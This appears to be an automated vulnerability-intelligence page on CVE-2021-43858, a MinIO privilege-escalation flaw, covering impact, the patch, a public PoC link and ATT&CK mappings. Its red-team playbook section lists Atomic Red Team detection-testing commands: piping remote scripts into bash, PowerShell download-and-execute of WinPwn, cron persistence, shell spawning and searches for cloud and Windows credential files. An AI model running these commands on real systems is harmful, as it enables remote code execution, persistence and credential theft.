CVE-2021-43858
Overview
This vulnerability is an authorization bypass in the MinIO cloud storage service's HTTP API. The root cause lies in insufficient validation of user privileges when processing policy update requests, allowing a malicious client to manipulate access control policies. The affected component is the user policy management API endpoint in MinIO versions prior to RELEASE.2021-12-27T07-23-18Z.
Vulnerability Description
MinIO is a Kubernetes native application for cloud storage. Prior to version `RELEASE.2021-12-27T07-23-18Z`, a malicious client can hand-craft an HTTP API call that allows for updating policy for a user and gaining higher privileges. The patch in version `RELEASE.2021-12-27T07-23-18Z` changes the accepted request body type and removes the ability to apply policy changes through this API. There is a workaround for this vulnerability: Changing passwords can be disabled by adding an explicit `Deny` rule to disable the API for users.
Impact
An attacker with limited privileges can exploit this vulnerability to escalate their access by altering user policies, effectively gaining higher privileges within the MinIO environment. This requires network access and some level of authenticated user interaction, as indicated by the CVSS vector (PR:L, UI:N). The consequence includes unauthorized access to sensitive data and potential disruption of cloud storage operations due to privilege escalation.
Solution
Upgrade MinIO to version RELEASE.2021-12-27T07-23-18Z or later, which includes a patch that changes the accepted request body type and removes the ability to update user policies through the vulnerable API. Additionally, as a workaround, administrators can add an explicit Deny rule to disable password changes via the API for users. Detailed patch instructions and advisory information are available at https://github.com/minio/minio/security/advisories/GHSA-j6jc-jqqc-p6cx.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the cloud storage application MinIO allows a malicious client to exploit an improperly secured HTTP API, enabling unauthorized policy updates for users. This flaw arises from the application’s failure to adequately validate the request body of incoming API calls. Specifically, prior to the patch released on December 27, 2021, the API could be manipulated to accept crafted requests that could alter user permissions, effectively granting elevated privileges to an attacker. The lack of stringent checks on the request body type allowed for this privilege escalation, which could lead to severe security breaches if left unaddressed.
Attack vectors for this vulnerability are particularly concerning given the nature of cloud storage applications and their integration within Kubernetes environments. An attacker could leverage this flaw by sending specially crafted HTTP requests to the MinIO API, targeting users with insufficiently protected accounts. Once the attacker successfully alters the policy for a user, they could gain access to sensitive data, modify storage configurations, or even delete critical information. This exploitation could occur in various scenarios, including within multi-tenant environments where different users share the same MinIO instance, amplifying the risk of collateral damage.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on MinIO for cloud storage solutions. The potential for unauthorized access to sensitive data poses a considerable business risk, including data breaches, regulatory non-compliance, and reputational damage. Organizations could face legal repercussions if sensitive customer information is exposed or misused due to this vulnerability. Additionally, the financial implications of a data breach can be substantial, encompassing costs related to incident response, remediation, and potential fines from regulatory bodies.
To detect and mitigate this vulnerability, organizations should prioritize upgrading to the patched version of MinIO, which addresses the issue by altering the accepted request body type and removing the ability to apply policy changes through the vulnerable API. In addition to upgrading, implementing strict access controls and monitoring API usage can help identify and prevent unauthorized attempts to exploit this vulnerability. Organizations may also consider applying an explicit "Deny" rule to disable the API for users, as a temporary workaround while transitioning to the updated version. Regular security assessments and audits of the MinIO deployment can further enhance the security posture, ensuring that any potential vulnerabilities are identified and remediated promptly.
In conclusion, the vulnerability in MinIO represents a critical security concern for organizations utilizing this cloud storage solution. The ability for a malicious client to escalate privileges through crafted API calls can lead to severe consequences, including unauthorized access to sensitive data and significant business risks. By adopting proactive detection and mitigation strategies, organizations can safeguard their environments against such vulnerabilities, ensuring the integrity and confidentiality of their data in cloud storage applications.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Minio | Minio | All |
cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
khuntor/CVE-2021-43858-MinIO
|
khuntor | 0 | 0 | 2023-04-12 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
echo "#{command}" > /etc/cron.d/#{cron_script_name}
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-43858 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/minio/minio/security/advisories/GHSA-j6jc-jqqc-p6cx |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/pull/13976 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/pull/7949 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/commit/5a96cbbeaabd0a82b0fe881378e7c21c85091abf |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/releases/tag/RELEASE.2021-12-27T07-23-18Z |